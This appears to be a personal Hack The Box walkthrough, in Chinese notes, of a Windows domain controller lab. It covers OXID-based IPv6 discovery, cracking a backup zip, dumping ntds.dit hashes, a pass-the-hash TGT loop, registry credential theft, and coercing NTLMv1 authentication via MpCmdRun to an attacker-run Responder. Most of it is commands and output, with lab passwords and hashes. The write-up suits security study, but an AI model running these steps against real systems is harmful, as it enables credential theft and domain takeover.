Recon
IP address :
10.10.10.213
PORT STATE SERVICE 80/tcp open http 135/tcp open msrpc
PORT STATE SERVICE VERSION 80/tcp open http Microsoft IIS httpd 10.0 |_http-title: Gigantic Hosting | Home |_http-server-header: Microsoft-IIS/10.0 | http-methods: |_ Potentially risky methods: TRACE 135/tcp open msrpc Microsoft Windows RPC Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port Device type: general purpose Running (JUST GUESSING): Microsoft Windows 2016 (88%) OS CPE: cpe:/o:microsoft:windows_server_2016 Aggressive OS guesses: Microsoft Windows Server 2016 (88%) No exact OS matches for host (test conditions non-ideal). Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
PORT STATE SERVICE 80/tcp open http |_http-stored-xss: Couldn't find any stored XSS vulnerabilities. |_http-dombased-xss: Couldn't find any DOM based XSS. |_http-csrf: Couldn't find any CSRF vulnerabilities. 135/tcp open msrpc
看一下80
扫一下目录
sudo gobuster dir -u http://10.10.10.213 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -t 50
没有看到有用目录
HTTrack Website Copier
google 一下利用不了
看看图片有无隐写
没有
切回来看看其他端口
googling for 135 MSRPC
rpcdumpexport PATH=/usr/share/doc/python3-impacket/examples:$PATH rpcdump.py 10.10.10.213 -port 135
rpcmaprpcmap.py ncacn_ip_tcp:10.10.10.213[135]
爆破一下uuids,opnums
rpcmap.py ncacn_ip_tcp:10.10.10.213[135] -brute-uuids -brute-opnums
99FCFEC4-5260-101B-BBCB-00AA0021347A
googling…
IObjectExporter?
看一下成功的opnum(3&5)
都是serverAlive的method
googling…
搜一下
OXID resolver
下载过来
wget https://raw.githubusercontent.com/mubix/IOXIDResolver/master/IOXIDResolver.py
./IOXIDResolver.py -t 10.10.10.213
取出了IPv6的地址
dead:beef::b885:d62a:d679:573f
检查一下是否有效
sudo nmap -6 --min-rate 10000 -p- dead:beef::b885:d62a:d679:573f
53,80,88,135,389,445,464,593,636,3268,3269,5985,9389,47001,49664,49665,49666,49667,49669,49670,49675,49695,53837
88
kerberos5985
windows remote management47001
winrm域控部署了最下面这些端口都是动态端口,可能是临时起的服务
开始做服务枚举
sudo nmap -sT -sC -O -sV -p53,80,88,135,389,445,464,593,636,3268,3269,5985,9389,47001,49664,49665,49666,49667,49669,49670,49675,49695,53837 -6 dead:beef::b885:d62a:d679:573f -oA nmap/v6service
PORT STATE SERVICE VERSION 53/tcp open domain Simple DNS Plus 80/tcp open http Microsoft IIS httpd 10.0 | http-server-header: | Microsoft-HTTPAPI/2.0 |_ Microsoft-IIS/10.0 |_http-title: Bad Request 88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2023-10-29 15:01:52Z) 135/tcp open msrpc Microsoft Windows RPC 389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: htb.local, Site: Default-First-Site-Name) |_ssl-date: 2023-10-29T15:03:03+00:00; 0s from scanner time. | ssl-cert: Subject: commonName=apt.htb.local | Subject Alternative Name: DNS:apt.htb.local | Not valid before: 2020-09-24T07:07:18 |_Not valid after: 2050-09-24T07:17:18 445/tcp open microsoft-ds Windows Server 2016 Standard 14393 microsoft-ds (workgroup: HTB) 464/tcp open kpasswd5? 593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0 636/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: htb.local, Site: Default-First-Site-Name) | ssl-cert: Subject: commonName=apt.htb.local | Subject Alternative Name: DNS:apt.htb.local | Not valid before: 2020-09-24T07:07:18 |_Not valid after: 2050-09-24T07:17:18 |_ssl-date: 2023-10-29T15:03:03+00:00; 0s from scanner time. 3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: htb.local, Site: Default-First-Site-Name) |_ssl-date: 2023-10-29T15:03:03+00:00; 0s from scanner time. | ssl-cert: Subject: commonName=apt.htb.local | Subject Alternative Name: DNS:apt.htb.local | Not valid before: 2020-09-24T07:07:18 |_Not valid after: 2050-09-24T07:17:18 3269/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: htb.local, Site: Default-First-Site-Name) | ssl-cert: Subject: commonName=apt.htb.local | Subject Alternative Name: DNS:apt.htb.local | Not valid before: 2020-09-24T07:07:18 |_Not valid after: 2050-09-24T07:17:18 |_ssl-date: 2023-10-29T15:03:03+00:00; 0s from scanner time. 5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP) |_http-title: Bad Request |_http-server-header: Microsoft-HTTPAPI/2.0 9389/tcp open mc-nmf .NET Message Framing 47001/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP) |_http-server-header: Microsoft-HTTPAPI/2.0 |_http-title: Bad Request 49664/tcp open msrpc Microsoft Windows RPC 49665/tcp open msrpc Microsoft Windows RPC 49666/tcp open msrpc Microsoft Windows RPC 49667/tcp open msrpc Microsoft Windows RPC 49669/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0 49670/tcp open msrpc Microsoft Windows RPC 49675/tcp open msrpc Microsoft Windows RPC 49695/tcp open msrpc Microsoft Windows RPC 53837/tcp open msrpc Microsoft Windows RPC No OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ). TCP/IP fingerprint: OS:SCAN(V=7.94%E=6%D=10/29%OT=53%CT=%CU=%PV=N%DS=1%DC=D%G=Y%TM=653E7428%P= OS:x86_64-pc-linux-gnu)S1(P=6000{4}28067fXX{32}0035c8a84de4f61758431873a01 OS:22000b389000002040526010303080402080a001def8cff{4}%ST=0.241679%RT=0.276 OS:587)S2(P=6000{4}28067fXX{32}0035c8a917972cc858431874a0122000b2c10000020 OS:40526010303080402080a001defefff{4}%ST=0.340627%RT=0.375607)S3(P=6000{4} OS:28067fXX{32}0035c8aa85595bf158431875a0122000187000000204052601030308010 OS:1080a001df054ff{4}%ST=0.441347%RT=0.479882)S4(P=6000{4}28067fXX{32}0035 OS:c8ab7344ceb958431876a0122000b444000002040526010303080402080a001df0c9ff{ OS:4}%ST=0.541405%RT=0.595134)S5(P=6000{4}28067fXX{32}0035c8ac868640755843 OS:1877a01220002ef3000002040526010303080402080a001df11bff{4}%ST=0.640609%R OS:T=0.675501)S6(P=6000{4}24067fXX{32}0035c8adba36bcb4584318789012200092ac OS:0000020405260402080a001df17fff{4}%ST=0.740609%RT=0.776433)IE1(P=6000{4} OS:803a7fXX{32}8100cabdabcd00{122}%ST=0.765916%RT=0.859558)TECN(P=602000{3 OS:}20067fXX{32}0035c8ae088813c65843187980522000f1a60000020405260103030801 OS:010402%ST=0.964534%RT=1.00174)EXTRA(FL=12345) Network Distance: 1 hop Service Info: Host: APT; OS: Windows; CPE: cpe:/o:microsoft:windows Host script results: | smb-security-mode: | account_used: <blank> | authentication_level: user | challenge_response: supported |_ message_signing: required | smb-os-discovery: | OS: Windows Server 2016 Standard 14393 (Windows Server 2016 Standard 6.3) | Computer name: apt | NetBIOS computer name: APT\x00 | Domain name: htb.local | Forest name: htb.local | FQDN: apt.htb.local |_ System time: 2023-10-29T15:02:55+00:00 |_clock-skew: mean: 0s, deviation: 1s, median: 0s | smb2-time: | date: 2023-10-29T15:02:53 |_ start_date: 2023-10-29T14:30:27 | smb2-security-mode: | 3:1:1: |_ Message signing enabled and required OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 79.40 seconds
本地做一个域名映射
htb.local
→ ipv6 看看smb
sudo smbclient -L //htb.local
Anonymous login successful Sharename Type Comment --------- ---- ------- backup Disk IPC$ IPC Remote IPC NETLOGON Disk Logon server share SYSVOL Disk Logon server share htb.local is an IPv6 address -- no workgroup available
sudo smbclient //htb.local/backup get backup.zip
来看看backup.zip
┌──(root㉿kali1)-[~/Desktop/APT] └─# unzip -l backup.zip Archive: backup.zip Length Date Time Name --------- ---------- ----- ---- 0 2020-09-23 19:40 Active Directory/ 50331648 2020-09-23 19:38 Active Directory/ntds.dit 16384 2020-09-23 19:38 Active Directory/ntds.jfm 0 2020-09-23 19:40 registry/ 262144 2020-09-23 19:22 registry/SECURITY 12582912 2020-09-23 19:22 registry/SYSTEM --------- ------- 63193088 6 files
ntds
是域控的SAMntds.jfm
的作用是防止ntds.dit
写入丢失0 2020-09-23 19:40 registry/ 262144 2020-09-23 19:22 registry/SECURITY 12582912 2020-09-23 19:22 registry/SYSTEM
这三个文件很重要,但不知道相比最新版本有没有不同
sudo unzip backup.zip
需要密码,试着破解
sudo zip2john backup.zip > hash4backup
johnjohn --wordlist=/usr/share/wordlists/rockyou.txt hash4backup
iloveyousomuch (backup.zip)
sudo unzip backup.zip
接下来将密钥进行转储和读取,可进行在线转储
secretsdump.py
secretsdump.py -ntds Active\ Directory/ntds.dit -system registry/SYSTEM LOCAL > ../user_hash_raw
转储出8000行数据
evil-winrm -i htb.local -u administrator -H '2b576acbe6bcfda7294d6bd18041b8fe’
失败, 提取一下所有带‘:::’的用户名和密码。username, hashlist
cat ../user_hash_raw | grep ':::' | awk -F ':' '{print $1}' >> username
cat ../user_hash_raw | grep ':::' | awk -F ':' '{print $3,$4}' | sed 's/ /:/g' >> hashlist
枚举有效用户(pre-authentication)
kerbrute userenum -d htb.local --dc htb.local username
2023/11/05 13:40:19 > [+] VALID USERNAME: Administrator@htb.local 2023/11/05 13:40:19 > [+] VALID USERNAME: APT$@htb.local 2023/11/05 13:44:14 > [+] VALID USERNAME: henry.vinson@htb.local
提取到user_3
crackmapexec smb htb.local -u user_3 -H backup/hashlist
不行
get_TGT.sh
#!/bin/bash while IFS='' read -r LINE || [ -n "${LINE}"] do echo "------------------" echo "Feed the Hash:${LINE}" /usr/share/doc/python3-impacket/examples/getTGT.py htb.local/henry.vinson@htb.local -hashes ${LINE} done < hashlist
写一个脚本来取得票据
watch "ls -ltr | tail -2"
监控目录
henry.vinson@htb.local.ccache aad3b435b51404eeaad3b435b51404ee:e53d87d42adaa3ca32bdb34a876cbffb
找到了一个有效票据,试试
aad3b435b51404eeaad3b435b51404ee
为空密码,我取后一段e53d87d42adaa3ca32bdb34a876cbffb
evil-winrm -i htb.local -u henry.vinson -H 'e53d87d42adaa3ca32bdb34a876cbffb'
失败
psexec.py -hashes 'aad3b435b51404eeaad3b435b51404ee:e53d87d42adaa3ca32bdb34a876cbffb' htb.local/henry.vinson@htb.local
[*] Requesting shares on htb.local..... [-] share 'backup' is not writable. [-] share 'NETLOGON' is not writable. [-] share 'SYSVOL' is not writable.
wmiexec.py -hashes 'aad3b435b51404eeaad3b435b51404ee:e53d87d42adaa3ca32bdb34a876cbffb' htb.local/henry.vinson@htb.local
[*] SMBv3.0 dialect used [-] rpc_s_access_denied
dcomexec.py -hashes 'aad3b435b51404eeaad3b435b51404ee:e53d87d42adaa3ca32bdb34a876cbffb' htb.local/henry.vinson@htb.local
smbexec.py -hashes 'aad3b435b51404eeaad3b435b51404ee:e53d87d42adaa3ca32bdb34a876cbffb' htb.local/henry.vinson@htb.local
[-] DCERPC Runtime Error: code: 0x5 - rpc_s_access_denied
试一下注册表
reg.py -hashes 'aad3b435b51404eeaad3b435b51404ee:e53d87d42adaa3ca32bdb34a876cbffb' -dc-ip htb.local htb.local/henry.vinson@htb.local query -keyName HKU\\
reg.py -hashes 'aad3b435b51404eeaad3b435b51404ee:e53d87d42adaa3ca32bdb34a876cbffb' -dc-ip htb.local htb.local/henry.vinson@htb.local query -keyName HKU\\Software
这是之前在80端口web端看到的名字
GiganticHostingManagementSystem
reg.py -hashes 'aad3b435b51404eeaad3b435b51404ee:e53d87d42adaa3ca32bdb34a876cbffb' -dc-ip htb.local htb.local/henry.vinson@htb.local query -keyName HKU\\Software\\GiganticHostingManagementSystem
直接爆出来用户名密码
henry.vinson_adm:G1#Ny5@2dvht
用evil-winrm进行横向移动
evil-winrm -i htb.local -u henry.vinson_adm -p 'G1#Ny5@2dvht'
成功登录
*Evil-WinRM* PS C:\Users\henry.vinson_adm\Documents> whoami /priv PRIVILEGES INFORMATION ---------------------- Privilege Name Description State ============================= ============================== ======= SeMachineAccountPrivilege Add workstations to domain Enabled SeChangeNotifyPrivilege Bypass traverse checking Enabled SeIncreaseWorkingSetPrivilege Increase a process working set Enabled
type C:/users/henry.vinson_adm/appdata/Roaming/Microsoft/Windows/PowerShell/PSReadline/ConsoleHost_history.txt
$Cred = get-credential administrator invoke-command -credential $Cred -computername localhost -scriptblock {Set-ItemProperty -Path "HKLM:\SYSTEM\CurrentControlSet\Control\Lsa" lmcompatibilitylevel -Type DWORD -Value 2 -Force}
GPT:
LmCompatibilityLevel
定义了客户端和服务器之间在建立会话时使用的身份验证模式或网络安全协议。具体来说,LmCompatibilityLevel
的值为2
意味着:- 客户端不会发送LM响应给服务器。
- 服务器会接受LM、NTLM和NTLMv2认证。
- 服务器会尝试使用NTLMv2会话安全,如果失败则退回到NTLM。
Googling…
Responder
lgandx • Updated May 2, 2024
mpCmdRun.exe
用来下载文件git clone https://github.com/lgandx/Responder.git
sudo ./Responder.py -I tun0 --lm -v
设置一个16位chall set
Windows这边Windows Defender目录下载
.\MpCmdrun.exe -Scan -scantype 3 -File \\10.10.16.2\nodexist
./ntlmv1.py --ntlmv1 APT$::HTB:6357C2E21068CA76DAEE4B944CFF3622034580F3BFECBF07:6357C2E21068CA76DAEE4B944CFF3622034580F3BFECBF07:1234567887654321
Hashfield Split: ['APT$', '', 'HTB', '6357C2E21068CA76DAEE4B944CFF3622034580F3BFECBF07', '6357C2E21068CA76DAEE4B944CFF3622034580F3BFECBF07', '1234567887654321'] Hostname: HTB Username: APT$ Challenge: 1234567887654321 LM Response: 6357C2E21068CA76DAEE4B944CFF3622034580F3BFECBF07 NT Response: 6357C2E21068CA76DAEE4B944CFF3622034580F3BFECBF07 CT1: 6357C2E21068CA76 CT2: DAEE4B944CFF3622 CT3: 034580F3BFECBF07 To Calculate final 4 characters of NTLM hash use: ./ct3_to_ntlm.bin 034580F3BFECBF07 1234567887654321 To crack with hashcat create a file with the following contents: 6357C2E21068CA76:1234567887654321 DAEE4B944CFF3622:1234567887654321 echo "6357C2E21068CA76:1234567887654321">>14000.hash echo "DAEE4B944CFF3622:1234567887654321">>14000.hash To crack with hashcat: ./hashcat -m 14000 -a 3 -1 charsets/DES_full.charset --hex-charset 14000.hash ?1?1?1?1?1?1?1?1 To Crack with crack.sh use the following token $NETLM$1234567887654321$6357C2E21068CA76DAEE4B944CFF3622034580F3BFECBF07
sudo ./Responder.py -I tun0 --lm -v
./ntlmv1.py --ntlmv1 APT$::HTB:95ACA8C7248774CB427E1AE5B8D5CE6830A49B5BB858D384:95ACA8C7248774CB427E1AE5B8D5CE6830A49B5BB858D384:1122334455667788
Hashfield Split: ['APT$', '', 'HTB', '95ACA8C7248774CB427E1AE5B8D5CE6830A49B5BB858D384', '95ACA8C7248774CB427E1AE5B8D5CE6830A49B5BB858D384', '1122334455667788'] Hostname: HTB Username: APT$ Challenge: 1122334455667788 LM Response: 95ACA8C7248774CB427E1AE5B8D5CE6830A49B5BB858D384 NT Response: 95ACA8C7248774CB427E1AE5B8D5CE6830A49B5BB858D384 CT1: 95ACA8C7248774CB CT2: 427E1AE5B8D5CE68 CT3: 30A49B5BB858D384 To Calculate final 4 characters of NTLM hash use: ./ct3_to_ntlm.bin 30A49B5BB858D384 1122334455667788 To crack with hashcat create a file with the following contents: 95ACA8C7248774CB:1122334455667788 427E1AE5B8D5CE68:1122334455667788 echo "95ACA8C7248774CB:1122334455667788">>14000.hash echo "427E1AE5B8D5CE68:1122334455667788">>14000.hash To crack with hashcat: ./hashcat -m 14000 -a 3 -1 charsets/DES_full.charset --hex-charset 14000.hash ?1?1?1?1?1?1?1?1 To Crack with crack.sh use the following token NTHASH:95ACA8C7248774CB427E1AE5B8D5CE6830A49B5BB858D384